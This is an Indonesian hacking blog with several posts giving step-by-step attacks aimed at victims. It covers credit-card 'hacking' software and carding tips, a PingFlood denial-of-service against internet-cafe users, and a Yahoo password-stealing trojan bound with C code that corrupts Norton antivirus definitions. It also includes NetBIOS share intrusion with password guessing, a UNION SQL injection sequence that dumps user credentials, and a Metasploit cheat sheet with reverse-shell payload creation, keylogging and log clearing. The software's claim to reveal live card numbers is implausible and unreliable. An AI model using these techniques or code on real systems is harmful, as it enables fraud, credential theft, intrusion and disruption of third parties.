Selasa, 11 Desember 2012

1 Tips and Trick HACK KARTU KREDIT ( CREDIT CARD DENGAN SOFTWARE)

Langkah-langkahnya adalah sebagai berikut:
1. Download softwarenya dengan cara klik link download dibawah

Download

 2. Kemudian anda klik di sotware tersebut cc online.. terus anda akan memdapatkan  nomor kartu kredit yang sedang dipakai transaksi diseluruh dinia. DARI NOMOR YG ANDA DAPATKAN AKAN DI AKITI DENGAN CODE #@$ (ANGKA RAHASIA 3 ANGKA AKAN TERLIHAT)

MISAL : ACC: 891929834044-444 #@S667 ( 667 NOMOR RAHASIA)
NAME : Khend Harahap

LALU SELANJUTNYA COBA SAJA UTAK ATIK SENDIRI... 

Ma'af dosanya ditanggung masing-masing ya.....:D

4 Tips and Trik carding-kartu kredit tanpa software Hack

Assalamu'alaikum Wr.Wb.........
Salam Sejahtera Buat Kita Semua....:)
Hi......,,, abang-abang, kakak-kakak-,adek-adek, Tulang,Oppung Semuannya.....
Gimana kabarnya?, Semoga masih sehat Wal;afiat.....

Apa kita pernah memikirkan arti dari nomor kartu kredit?, dan bagaimana angka-angka tersebut dihasilkan? Atas dasar ilmu pengetahuan, berikut ini akan saya jabarkan RAHASIA-nya …
Pertama-tama anda harus mengenal bagian-bagian dari deretan angka pada kartu kredit tersebut.


Dari 16 angka yang anda lihat di kartu kredit Visa atau MasterCard, 6 digit pertamanya merupakan “issuer identifier“, yaitu kode jenis kartu kredit tersebut.
Jika 6 digit tersebut diawali dengan 4, berarti kartu kredit tersebut berjenis Visa.
Namun, jika 6 digit tersebut diawali dengan 5, berarti kartu kredit tersebut berjenis MasterCard.
Berikutnya, 1 digit terakhir dari 16 digit angka di kartu kredit tersebut berfungsi sebagai “check digit“, yang fungsinya hanya untuk validasi pengecekan nomor kartu kredit tersebut.
Karena 6 digit awal dan 1 digit terakhir tersebut sudah memiliki arti, berarti tinggal tersisa 9 digit di tengah yang berfungsi sebagai “account number“.
Oleh karena terdapat 10 kemungkinan angka (dari angka 0 sampai dengan 9) yang bisa dimasukkan ke tiap digit dari 9 digit “account number” tersebut, maka kombinasi yang dihasilkan dari 9 digit tersebut berjumlah 1 milyar kemungkinan nomor untuk masing-masing jenis kartu kredit (Visa atau MasterCard).
Adapun algoritma yang dipakai untuk menghasilkan deretan 16 angka untuk nomor kartu kredit tersebut dinamakan algoritma “Luhn” atau “Mod 10“.
Dulu pada tahun 1954, Hans Luhn dari IBM adalah orang yang pertama kali mengusulkan penerapan algoritma untuk mengetahui valid atau tidaknya suatu nomor kartu kredit.
Cara kerja algoritma yang sederhana (tapi luar biasa) ini adalah sebagai berikut :
1. Dimulai dari digit pertama, kalikan 2 semua angka yang menempati digit ganjil, sehingga secara keseluruhan akan ada 8 digit yang anda kalikan 2, yakni digit ke 1, 3, 5, 7, 9, 11, 13, dan 15.
2. Jika hasil perkalian 2 tersebut menghasilkan angka yang berjumlah 2 digit (10, 12, 14, 16, atau 18), maka jumlahkan angka masing-masing digit tersebut untuk menghasilkan 1 digit angka baru, sehingga hasil dari langkah pertama dan kedua ini tetap berupa 8 angka.
3. Langkah berikutnya, gantikan semua angka (nomor kartu kredit) yang terletak pada digit posisi ganjil tersebut dengan 8 angka baru tersebut, untuk menghasilkan deretan 16 angka baru.
4. Langkah terakhir, jumlahkan ke-16 angka tersebut. Jika hasil penjumlahannya merupakan kelipatan 10, berarti nomor kartu kredit tersebut valid, dan sebaliknya, jika tidak kelipatan 10, berarti nomor kartu kredit tersebut tidak valid.
Berikut ini saya berikan contoh perhitungan sebenarnya :


Seperti anda lihat di gambar di atas ini, nomor kartu kredit tersebut adalah 4552 7204 1234 5678, karena diawali dengan 4, berarti kartu tersebut berjenis Visa.
Sekarang kita lakukan perhitungannya.


Jika sudah anda hitung dengan teliti, maka akan terlihat bahwa jumlah akhirnya adalah 61, yang BUKAN merupakan bilangan kelipatan 10, sehingga bisa dipastikan bahwa nomor kartu kredit tersebut adalah tidak valid.
Seandainya “check digit” di contoh tersebut bukan 8, melainkan 7, maka secara algoritma, nomor kartu kredit tersebut akan menjadi valid, karena total penjumlahannya akan berubah menjadi 60, suatu bilangan kelipatan 10.
Berikut ini contoh yang lain :


Sekali lagi, lakukan kalkulasi sesuai algoritma Luhn di atas untuk kartu kredit MasterCard dengan nomor 5490 1234 5678 9123 tersebut.

Seperti bisa anda hitung sendiri, total penjumlahannya adalah 65, sehingga nomor kartu kredit tersebut tidak valid, karena 65 BUKAN bilangan kelipatan 10.
Seandainya, “check digit” kartu kredit tersebut bukan 3, melainkan 8, maka hasil penjumlahannya akan menjadi 70, yang merupakan kelipatan 10, sehingga nomor kartu kredit tersebut akan menjadi valid (secara algoritma).
Pengertian valid di atas adalah valid secara perhitungan matematika, bukan berarti nomor kartu kredit tersebut benar-benar pasti nomor kartu kredit yang asli.
Karena untuk pengecekan kartu kredit (pada saat transaksi online, misalnya) dibutuhkan tidak hanya nomor kartu kreditnya saja, tapi juga “expiry date“, serta “card security code” atau disebut juga dengan CVV (Card Verification Value) atau pun CVC (Card Verification Code) yang merupakan 3 digit terakhir di balik kartu kredit tersebut.
P.S. : Untuk kartu kredit American Express, jumlah digitnya bukan 16, tapi cuma 15, dan selalu diawali dengan 34 atau 37 untuk 2 digit pertamanya. Sedangkan untuk “account number“-nya hanya memiliki panjang 8 digit, bukan 9 digit seperti kartu kredit jenis Visa atau MasterCard.

Tutorial lebih lanjut klik link dibawah:
Aplikasi Hack
atau  bisa juga disini===> Tutorial

Sekian dulu yah,,,,,,,
moga bermanfaat.
n/b: Jangan Disalah gunakan :D

Sabtu, 10 November 2012

1 Serangan DOS Dengan PingFlood

Assalamu’alaikum......
Salam Sejahtera Untuk kita semua...
Hai Lae..,,, abang,,,,,, adek,,,, kakak,,,, Tulang,,,,, Oppung semuanya....…
Semoga masih sehat yah.....

Saya akan membahas tentang DoS PingFlood.

Apakah DoS PingFlood itu?
Software ini hanya dijalankan di Windows dan menggunakan System PING dan ICMP Protocol yang memungkinkan pengiriman paket dengan cepat.
Korban yang terserang DSPF (sebut saja DoS PingFlood) akan mengalami peningkatan jaringan Traffic yang penuh
DoS Ping Flood adalah aplikasi yang dioperasikan pada sistem operasi windows. Buat yang belum mengetahui apa itu DDoS Attack silakan baca dulu artikel saya Denial Of Service | Attack . Ping flood menggunakan metode ping dan mengunakan protokol ICMP, tetapi dalam paket dengan jumlah yang sangat banyak serta sangat cepat pengirimannya. Ping flood dibuat oleh www.loranbase.com pada tanggan 1 Februari 2007. Versi yang saya share-kan saat ini adalah versi v1.0. Penggunaan ping flood harus pada sistem operasi windows karena aplikasi ping flood merupakan executable ( berekstensi .exe )
Korban dari ping flood ini antara lain modem, windows, Linux, router, dan server. Semua sistem operasi dan mesin dijaringan komputer yang memiliki IP address bisa diserang tanpa terkecuali. Efek dari ping flood ini, yaitu aktifitas komputer korban yang meningkat serta traffic jaringan komputer penuh.
Aplikasi ping sendiri aslinya digunakan untuk mengecek apakah sebuah host di jaringan komputer aktif atau tidak. Tetapi jika paket yang dikirim untuk ping jumlahnya terlalu banyak, maka hal ini dapat termasuk dalam katagori DDoS Attack.

Baiklah langsung saja, pertama download dulu aplikasi Ping Flood V.1.0 berikut:

DOWNLOAD PINGFLOOD TOOLS 
Password : h4r4h4p
* Persiapan serangan
- Modem / Router
- Komputer dengan OS Windows ( XP, Vista, 7 )
- Aplikasi Ping flood yang didownload tadi
- Putty untuk remote / Linux
- Command Prompt Windows
- Korban / Target yang memiliki security LOW
* Instalasi PingFlood
  1. Ekstrak file pingflood yang didownload tadi.
  2. Copy aplikasi pingflood tersebut kedalam hardisk derektori Windows C:\WINDOWS. Ingat copy hanya aplikasi ping flood.exe saja bukan foldernya.
  3. Setelah pengcopian selesai cek apakah aplikasi tersebut sudah bisa digunakan. Caranya aktifkan Command Prompt dengan klik start > run > tulis cmd. Selanjutnya ketik pingflood pada Command Promp, jika berhasil maka akan ada tampilan seperti ini :
Format perintah dari ping flood:  pingflood.exe <victim> [option]
  • Pingflood.exe artinya mengaktifkan aplikasi ping flood
  • <victim> artinya IP address atau domain website yang akan dijadikan korban
  • [option] adalah opsi tertentu jika ingin mengirim paket DoS ping flood dengan ukuran, jumlah dan delay tertentu.
Contoh :
pingflood 192.168.1.3 -n 100 -d 50 -s 15000
Penjelasan :
  • pingflood,  artinya mengaktifkan aplikasi ping flood.
  • 192.168.1.3, adalah IP korban yang akan diserang menggunakan ping flood.
  • -n, artinya jumlah paket yang berjumlah 100.
  • -d, artinya delay tiap pengiriman paket.
  • -s 15000, artinya ukuran data yang dikirim sebesar 15000 bytes.
* Praktek Serangan
Saya asumsikan kalian telah mengetahui IP address korban yang akan kalian serang sebagai contoh (192.168.3.1). Saya misalkan IP nya adalah 192.168.3.1. Kalian bisa mencobanya di dalam sebuah warnet, kerana dengan mudah kalian bisa mengetahui IP pengguna lain didalam satu warnet. Kalian bisa gunakan Tools seperti IP Scanner ataupun Net Tools.
- Aktifkan Command Prompt klik start > run > tulis cmd
- Lakukan pengujian ping ke modem korban, caranya ketik ping 192.168.3.1
Pengujian diatas menunjukan pengujian ping berhasil dan keadaan normal tidak ada paket yang loss. Rata-rata waktu tempuh 0 mili second.
- Sekarang coba Ping flood ke korban caranya :
Ketik pada command Prompt pingflood 192.168.3.1


Akan terlihat perbedaan yang sangat segnifikan antara keadaan normal dengan keadaan pada saat melakukan ping flood atau serangan DDoS tersebut. Kalian bisa lihat perbedaannya pada saat melakukan ping flood selama lebih kurang 1-3 menit lakukan ping ke modem korban, maka kalian akan melihat banyaknya jumlah paket yang loss. selama itu ping tersebut komputer korban akan dibanjiri kiriman paket data sehingga komputer korban tidak bisa beroperasi seperti normalnya.

NB : Cara ini sebaiknya dijadikan sebagai pembelajaran saja, saya tidak akan bertanggung jawab atas penyalah gunaan cara diatas.
Silahkan dipraktekan, dan jangan Kecanduan karena Kasihan Korban yang terkena serangan DoS PingFlood.
Saya hanya Share Ilmu saya ke Sahabat BinusHacker, agar lebih bertambah wawasan anda.
SEMOGA BERMANFAAT
Wassalamu’alaikum wr.wb

Rabu, 12 September 2012

0 Perintahkan Trojan Menjadi Maling



 Mari kita bermain2 dengan trojan... tapi sebaiknya sebelum Anda membaca tulisan ini ada baiknya membaca tulisan gue sebelumnya tentang "Trojanku Sayang.. Trojanku Hilang" karena pada tulisan tersebut Anda akan mendapatkan pengetahuan tentang peralatan pendukung yang bisa digunakan dalam penyerangan mempergunakan trojan.
Anda pernah kehilangan Yahoo Account...?? sehingga email Anda tidak bisa dibuka lagi...??? Itu semua karena Anda ceroboh... Anda kena aksi dari sebuah trojan atau bisa jadi kena Social Engineering... ;) atau apalah.. karena memang banyak cara untuk mengambil alih account yahoo orang lain...
Kali gue mau main2 dengan trojan, nanti trojannya dikasih tugas untuk mendapatkan Yahoo account berupa username + passwordnya.
Trojan ini memang diciptakan dan selalu dikembangkan sesuai dengan perkembangan versi Yahoo Messenger.
Trojannya kita buat dengan trojan generator kemudian kita binding (ikat) dengan aplikasi pem-binding. Nanti hasil dari pembindingannya kita sebar di beberapa tempat, bisa melalui email, kirim langsung melalui YM atau dengan cara membuang (?) CD ditempat tertentu.

Bagaimana caranya?
Persiapan :
[-] Magic-PS Trojan Generator. Bisa Anda download disini : http://lirva32.org/download/Magic-PS-15se++.zip
[-] File Binder. Anda bisa memanfaatkan file binder apapun.
[-] C Compiler


Target Trojan :
[-] User yang mempergunakan windows (-- yg pake linux aman bro ;)
[-] User yang masih bisa kena 'social engineering' (bro.. terserah gimana caranya deh.. biar tuh user bisa mati'in Antivirusnya....)
Kalo dia ga mau mati'in ya udah nanti kita matikan secara paksa dengan coding tertentu... ingat jangan maen clurit ya? ;) ).


Pembuatan Trojan :
[-] Matikan semua Antivirus yang berada di komputer Anda (--hhikkzzz.. kalo ga dimatikan bakalan ga' bisa bikin trojan).
[-] Buatlah sebuah folder untuk menempatkan hasil trojan.
[-] Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah trojan generator tersebut.

Nanti tampilannya seperti ini :


 Keterangan Trojan :

[01] Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada trojan yang Anda inginkan, misalkan saja mengambil IP Address si target.

[02] File After Install, jika trojan ini dieksekusi maka trojan tersebut akan melakukan penyamaran diri berupa file 'regsvr.exe'. Anda bisa memilih file penyamaran lainnya.

[03] Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut tidak disertai "@yahoo.com". Jadi cukup mengisi ID saja. Trojan akan mencuri account + password si target kemudian secara otomatis trojan akan mengirim account tersebut ke email Anda (alamat email yang Anda set di trojan loh...)

[04] Choose icon, silahkan Anda memilih icon penyamaran trojan.

[05] FileName, ini merupakan file trojan hasil generator. File inilah yang nantinya Anda kirim ke target yang menjadi sasaran kita ;)
jangan sekali2 mengeksekusi file ini di komputer milik pribadi.... ;)

[06] Create MPS merupakan tombol yang men-generate trojan.




 Penyiapan Routin Pembunuh NAV :

Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk membunuh NAV secara paksa. Routine ini dibuat oleh teman saya : Magic_h2001
(Hai 'Magic_h2001'... thx for ur code).

//--- code ----//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/

#include <windows.h>
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
    return 1;
    size=sizeof(buff);
    temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
    return 1;
    RegCloseKey(handle);
    strcat(buff,"\\Symantec Shared\\virusdefs\\");
    strcpy(fName,buff);
    strcat(buff,"definfo.dat");
    SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
    GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
    return 1;
    strcat(fName,dirName);
    strcat(fName,"\\VIRSCAN1.DAT");
    SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
    handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
    OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
    return 1;
    size=GetFileSize(handle,&temp)-32;
    Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
  {
     CloseHandle(handle);
     return 1;
  }
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}


* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.

//--- code ----//


Proses Penyerangan :

Anggap saja dari beberapa proses tersebut diatas kita sudah mememiliki 2 (dua) file yaitu :
- sender.exe ----> trojan
- killanvir.exe ----> pembunuh NAV.

Kini saatnya Anda melakukan proses Binder terhadap keduanya. Yang terpenting pada proses Binder file yang bekerja pertama adalah killanvir.exe.
Hal ini dilakukan agar sebelum trojannya jalan, NAV sudah terbunuh lebih dulu. Setelah proses binding selesai kini saatnya Anda menyebarkan file tersebut ke target yang dituju. Terserah, dengan metode apapun (sekali lagi, jangan pakai clurit! ;) ).


Selamat menikmati trojan, dan ingat segala yang anda lakukan adalah tanggung jawab anda, anda dapat menghubungi penulis untuk berdiskusi.

Minggu, 09 September 2012

0 Hacking_(Sekedar Pembelajaran)


hacker

Hacking yaitu menjebol sistem keamanan komputer untuk mendapatkan hak akses tertinggi (administrator/root) sehingga kita bisa mengendalikan komputer itu sendiri baik secara local atau remote (jarak jauh).
Bagi siapa saja yang ingin belajar hacking alias jadi hacker cara berikut bisa di coba:
  1. Pahami bahasa Inggris karena dalam dunia hacking kebanyakan menggunakan istilah dalam bahasa Inggris
  2. Belajar pemrograman (C/C++, Python, Javascript, dll)
  3. Belajar networking ( TCP/IP)
  4. Belajar UNIX (Linux)
  5. Belajar Operating System
  6. Belajar tentang database (MySQL, Oracle,dll)
  7. Belajar sabar, tekun, insting, dan penalaran karena dalam proses hacking kadang sangat menguras tenaga dan pikiran.
Rekomendasi buku bacaan untuk belajar hacking bagi pemula:
  • The C Programming Language 2nd Edition by Dennis Ritcie dan Brian W. Kernigan
  • The C++ Programming Language by Bjarne Stroustrup
  • Learning Perl by Randal Schwartz, Tom Christiansen & Larry Wall
  • TCP/IP Illustrated Vol. 1 by W. Richard Stevens
  • Learning the Unix Operating System by Jerry Peek, Grace Todino & John Strang
  • Operating System Internals by William Stalling
  • Operating Systems : Design and Implementation 2nd Edition by Andrew S. Tanenbaum & Albert S. Woodhull
  • Hacking Exposed : Network Security Secrets and Solutions by Stuart McClure, Joel Scambray and George Kurtz
Nah loch… pusing ga tuh? Masih banyak rekomendasi buku lain tapi belum  saya sebutkan karena takut kalian pingsan setelah baca buku-buku tersebut wakakak…
Berikut ini saya berikan contoh metode termudah masuk ke komputer orang lain yang biasa dilakukan oleh para Script Kiddies. Metode ini disebut NetBIOS Hacking, metode ini digunakan dengan memanfaatkan kelalaian atau ketidaktahuan seseorang men-share file ke jaringan.
Biasanya metode ini berhasil dipakai pada suatu LAN seperti hotspot area yang ramai karena terkadang ada aja orang yang men-share file tertentu ke jaringan. Kalau beruntung mungkin kamu bisa menemukan drive sensitive yang di share, contoh drive C:\ pada windows.
Berikut ini caranya : Pengetahuan dasar yang harus dikuasai untuk menggunakan metode ini adalah menguasai perintah2 DOS (Command Prompt) dan IP addressing. Tools yang dipakai dalam metode ini antara lain :
1. Nmap (Network scanner andalan hacker dunia, sempat dipakai dalam film Matrix Reloaded)
2. Nbtscan (tool ini lebih mudah dipakai dalam metode ini karena hanya men-scan netbios port).
Praktek : Bukalah DOS Prompt dengan meng-klik Start –> Run –> ketik CMD –> Enter Misalkan kamu dalam suatu LAN seperti hotspot area, ketik Ipconfig untuk melihat IP address kamu di LAN tersebut, misalnya IP kamu adalah 192.168.1.100. Untuk melihat komputer siapa saja yang terhubung di LAN tersebut gunakanlah nmap. Contoh :
C:\>nmap -sP 192.168.1.0/24 Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-28 15:40 GMT Standard Time Host 192.168.1.1 appears to be up Host 192.168.1.3 appears to be up Host 192.168.1.32 appears to be up Host 192.168.1.97 appears to be up Host 192.168.1.100 appears to be up Nmap done: 5 IP addresses (5 hosts up) scanned in 13.309 seconds
Berdasarkan hasil scanning diatas terlihat bahwa ada 5 komputer yang aktif dan terhubung ke jaringan (IP 192.168.1.1 adalah router). Dari hasil diatas juga terlihat bahwa IP kamu 192.168.1.100 terhubung ke jaringan. Untuk melihat IP adress mana yang membuka port netbios ketikkan perintah ini :
C:\>nmap -sS -p 139 192.168.1.0/24 Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-28 15:40 GMT Standard Time Interesting ports on 192.168.1.32: PORT STATE SERVICE 139/tcp open netbios-ssn MAC Address: 00:14:6C:19:F8:45 (Netgear)
Interesting ports on 192.168.1.100: PORT STATE SERVICE 139/tcp open netbios-ssn MAC Address: 00:21:7C:69:D5:30 (Netgear) Nmap done: 2 IP address (2 host up) scanned in 26.158 seconds
atau
C:\>nbtscan 192.168.1.0/24 Doing NBT name scan for addresses from 192.168.1.0/24
IP address     NetBIOS Name  Server      User    MAC address ——————————————————————————————- 192.168.1.32     Target         <unknown>         00-4a-53-24-c1-86 192.168.1.100    Kamu          <unknown>         00-1c-26-33-d4-70
Wow.. tampaknya IP 192.168.1.32 membuka port netbiosnya (ingat bahwa 192.168.1.100 adalah port kamu). Sekarang kita tinggal melihat apakah ada file yang di share oleh IP tersebut caranya ketik berikut :
C:\>net view \\192.168.1.32 Shared resources at \\192.168.1.32 Sharename Type Comment D Disk The command was completed successfully.
Wah ternyata target men-share directori D-nya. Setelah kita melihat nama folder yang di share lalu kita lihat apa isi dari folder tersebut dengan mengetik perintah berikut :
C:\>net use x: \\192.168.1.32\D The command completed succesfully
Penjelasan dari perintah tersebut yaitu kita akan menggunakan drive X dalam komputer kita untuk mengganti folder D dari komputer target. Drive X ini akan muncul pada windows explorer kamu setelah mengetik perintah diatas. Drive X ini adalah contoh dari saya, kamu bisa bebas menggunakan drive apapun selain drive yang telah ada di komputer kamu.
Perintah tersebut tidak berhasil jika komputer target meminta Username dan Password. Akan tetapi kita bisa mencoba dengan melakukan Password Guessing caranya
NET USE \\192.168.1.32\D “password” /USER: “target”
atau dengan melakukan IPC Null Sesion
NET USE \\192.168.1.32\IPC$ “” /USER: “”
Password yang mungkin disini biasanya: Username, Administrator, dll Cobalah terus melakukan password guessing.

=====================================================
Tutorial Singkat SQL Injection
SQL injection adalah sebuah teknik hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Berikut saya berikan tahapan-tahapan singkat dalam hacking website menggunakan SQL Injection :
1. http://www.korban.com/product.aspx?category=portable&id=1′
2.http://www.korban.com/product.aspx?category=portable&id=1 order by 10
3. http://www.korban.com/product.aspx?category=portable&id=1 order by 9
4. http://www.korban.com/product.aspx?category=portable&id=1 union all select 1,2,3,4,5,6,7,8,9–
5. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,2,3,4,5,6,7,8,9–
6. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,@@version,3,4,5,6,7,8,9–
7. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()–
8. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=0×7573657273–
9. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9 from users–
atau
http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,group_concat(concat_ws(char(32,58,32)username,password)),3,4,5,6,7,8,9 from users–
atau
http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9 from users–
==================================================== 
Ringkasan Perintah-perintah Dalam Metasploit Console
Metasploit merupakan salah satu program yang paling banyak dipakai baik oleh hacker, penetration tester maupun para script kiddie, berikut ini saya berikan ringkasan-ringkasan perintah dalam metasploit console (command line):
show exploits
show all exploits within the Framework.
show payloads
Show all payloads within the Framework.
show auxiliary
Show all auxiliary modules within the Framework.
search name
Search for exploits or modules within the Framework.
info
Load information about a specific exploit or module.
use name
Load an exploit or module (example: use windows/smb/psexec).
LHOST
Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.
RHOST
The remote host or the target.
set function
Set a specific value (for example, LHOST or RHOST).
setg function
Set a specific value globally (for example, LHOST or RHOST).
show options
Show the options available for a module or exploit.
show targets
Show the platforms supported by the exploit.
set target num
Specify a specific target index if you know the OS and service pack.
set payload payload
Specify the payload to use.
show advanced
Show advanced options.
set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.
check
Determine whether a target is vulnerable to an attack.
exploit
Execute the module or exploit and attack the target.
exploit -j
Run the exploit under the context of the job. (This will run the exploit in the background.)
exploit -z
Do not interact with the session after successful exploitation.
exploit -e encoder
Specify the payload encoder to use (example: exploit –e shikata_ga_nai).
exploit -h
Display help for the exploit command.
sessions -l
List available sessions (used when handling multiple shells).
sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.
sessions -s script
Run a specific Meterpreter script on all Meterpreter live sessions.
sessions -K
Kill all live sessions.
sessions -c cmd
Execute a command on all live Meterpreter sessions.
sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.
db_create name
Create a database to use with database-driven attacks (example: db_create autopwn).
db_connect name
Create and connect to a database for driven attacks (example: db_connect autopwn).
db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported, such as –sT –v –P0.)
db_autopwn -h
Display help for using db_autopwn.
db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.
db_destroy
Delete the current database. db_destroy user:password@host:port/database Delete database using advanced options.  

Meterpreter Commands
help
Open Meterpreter usage help. run scriptname Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.
sysinfo
show the system information on the compromised target.
ls
List the files and folders on the target. use privLoad the privilege extension for extended Meterpreter libraries.
ps
Show all running processes and which accounts are associated with each process.
migrate PID
Migrate to the specific process ID (PID is the target process ID gained from the ps command).
use incognito
Load incognito functions. (Used for token stealing and impersonation on a target machine.)
list_tokens -u
List available tokens on the target by user.
list_tokens -g
List available tokens on the target by group. impersonate_token DOMAIN_NAME\\USERNAME Impersonate a token available on the target.
steal_token PID
Steal the tokens available for a given process and impersonate that token.
drop_token
Stop impersonating the current token.
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.
shell
Drop into an interactive shell with all available tokens.
execute -f cmd.exe -i
Execute cmd.exe and interact with it.
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens.
execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.
rev2self
Revert back to the original user you used to compromise the target.
reg command
Interact, create, delete, query, set, and much more in the target’s registry.
setdesktop number
Switch to a different screen based on who is logged in.
screenshot
Take a screenshot of the target’s screen.
upload file
Upload a file to the target.
download file
Download a file from the target.
keyscan_start
Start sniffing keystrokes on the remote target.
keyscan_dump
Dump the remote keys captured on the target.
keyscan_stop
Stop sniffing keystrokes on the remote target.
getprivs
Get as many privileges as possible on the target.
uictl enable keyboard/mouse
Take control of the keyboard and/or mouse.
background
Run your current Meterpreter shell in the background.
hashdump
Dump all hashes on the target.
use sniffer
Load the sniffer module.
sniffer_interfaces
List the available interfaces on the target.
sniffer_dump interfaceID pcapname
Start sniffing on the remote target.
sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer.
sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing.
sniffer_stop interfaceID
Stop the sniffer.
add_user username password -h ip
Add a user on the remote target.
add_group_user “Domain Admins” username -h ip
Add a username to the Domain Administrators group on the remote target.
clearev
Clear the event log on the target machine.
timestomp
Change file attributes, such as creation date (antiforensics measure).
reboot
Reboot the target machine.

MSFpayload Commands
msfpayload -h
List available payloads.
msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X payload.exe
Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on port 443, and then save it as a Windows Portable Executable named payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R >
payload.raw
Same as above, but export as raw format. This will be used later in

Msfencode
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c Same as above but export as C-formatted shellcode.
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java Export as %u encoded JavaScript.

MSFencode Commands
msfencode -h
Display the msfencode help.
msfencode -l
List the available encoders.
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
Format to display the encoded buffer.
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
Create a multi-encoded payload.
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.
blackhat

3 Cracking




Bagi orang yang hobi mengkoleksi software seperti saya, adakalanya kita menginstal program demo atau shareware yang habis masa pakainya (EULA : End User License Agreement) setelah 30 hari atau 10 kali pemakaian tergantung dari vendor pembuat software. Lalu bagaimana caranya bila kita ingin memakai program tersebut lebih lama atau malah selamanya…?!!
Ada dua cara yaitu dengan membeli lisensi dari pembuat software atau meng-crack alias membobol sendiri proteksi software tersebut (bisa juga dengan mendownload crack, keygen, patch atau serial number hasil cracking dari para cracker dunia di situs-situs tertentu).
Bagi kamu yang ingin belajar menjadi cracker elit yang harus kamu pelajari adalah:
Belajar dan kuasai bahasa pemrograman Assembly, pahami processor arsitektur, memory management, dll.
Kamu harus familiar dengan Windows API (Application Programming Interface) dan system call pada Linux.
Download dan pelajarilah cara menggunakan debugger dan disassembler  serta hex editor seperti : IDA Pro, Ollydbg, Windbg, Immunity Debugger, Win32dasm, Winhex, Hiew, Dumpbin, dll.
Salah satu program cracking yang paling banyak dipakai dan disukai oleh para cracker adalah Ollydbg. Selain gratis, Ollydbg juga di lengkapi dengan banyak plugin yang banyak membantu dalam proses unpacking. Selain itu Ollydbg juga mempunyai GUI atau tampilan yang relatif simple dibandingkan dengan program cracking lainnya.
ollydbg1
Setahu saya buku-buku yang membahas tentang cracking software/reverse engineering masih sedikit tapi sudah cukup banyak tutorial yang bisa kamu dapatkan di internet. Berikut adalah beberapa buku bagus yang bisa membantu kamu menjadi software cracker/reverse engineering yang handal antara lain :
  1. The Art of Assembly Language by Randall Hyde
  2. Assembly Language Step by Step: Programming with DOS and Linux by Jeff Duntemann
  3. Disassembling Code: IDA Pro and SoftICE by Vlad Pirogov
